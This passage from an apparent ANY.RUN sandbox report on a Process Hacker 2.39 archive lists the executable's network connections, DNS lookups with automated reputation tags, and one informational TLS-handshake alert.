CLOUDFLARENET
suspicious
2768
ProcessHacker.exe
162.243.25.33:443
wj32.org
DIGITALOCEAN-ASN
US
suspicious
2768
ProcessHacker.exe
104.18.11.128:80
processhacker.sourceforge.net
CLOUDFLARENET
suspicious
2768
ProcessHacker.exe
104.18.11.128:443
processhacker.sourceforge.net
CLOUDFLARENET
suspicious

DNS requests

Domain
IP
Reputation
rentry.org
  • 198.251.88.130
suspicious
wj32.org
  • 162.243.25.33
whitelisted
processhacker.sourceforge.net
  • 104.18.11.128
  • 104.18.10.128
suspicious

Threats

PID
Process
Class
Message
2768
ProcessHacker.exe
Potentially Bad Traffic
ET INFO TLS Handshake Failure
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
processhacker-2.39-bin.zip